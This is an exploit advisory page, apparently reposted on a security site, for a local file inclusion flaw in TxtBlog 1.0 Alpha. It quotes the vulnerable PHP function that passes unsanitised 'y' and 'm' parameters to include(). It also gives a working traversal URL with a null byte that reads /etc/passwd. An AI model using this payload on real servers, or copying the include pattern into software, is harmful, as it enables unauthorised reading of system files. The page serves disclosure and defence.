TxtBlog (index.php m) Local File Inclusion Vulnerability

2008.12.21
Risk: Low
Local: No
Remote: Yes
CWE: CWE-22


Ogólna skala CVSS: 4.3/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Brak
Wpływ na dostępność: Brak

============================================================ TxtBlog (index.php m) Local File Inclusion Vulnerability ============================================================ ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 27 November 2008 SITE : cwh.citec.us ##################################################### APPLICATION : TxtBlog VERSION : v.1.0 Alpha DOWNLOAD : http://downloads.sourceforge.net/txtblogcms/txtblogcms-1.0a.zip ##################################################### --- Local File Inclusion --- ----------------------------- Vulnerable File (index.php) ----------------------------- function showMonth() { global $config_date_format, $txtblog_body, $txtblog_title, $config_title; $txtblog_body = ""; $txtblog_title = "$config_title - Archives"; $year = $_GET['y']; $month = $_GET['m']; $files = findFiles("data/$year/$month"); <<< BUG !!!! if (isset($files)) { foreach ($files as $file) { include ("data/$year/$month/$file"); <<< BUG !!!! $date_array = explode(" ",$date); $date = date($config_date_format, mktime($date_array[0], $date_array[1], $date_array[2], $date_array[3], $date_array[4], $date_array[5])); $txtblog_body .= "<span class='blog_title'>$title</span><br>\n<span class='blog_date'>$date</span><br>\n".bb2html($blog)."<br>\n<hr size='1'>\n"; } } } --------- Exploit --------- [+] http://[Target]/[txtblogcms_path]/index.php?y=2005&m=01/../../../../../../../../etc/passwd%00 ####################################################################################### Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK #######################################################################################

Referencje:

http://xforce.iss.net/xforce/xfdb/46902
http://www.securityfocus.com/bid/32498
http://www.milw0rm.com/exploits/7241


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top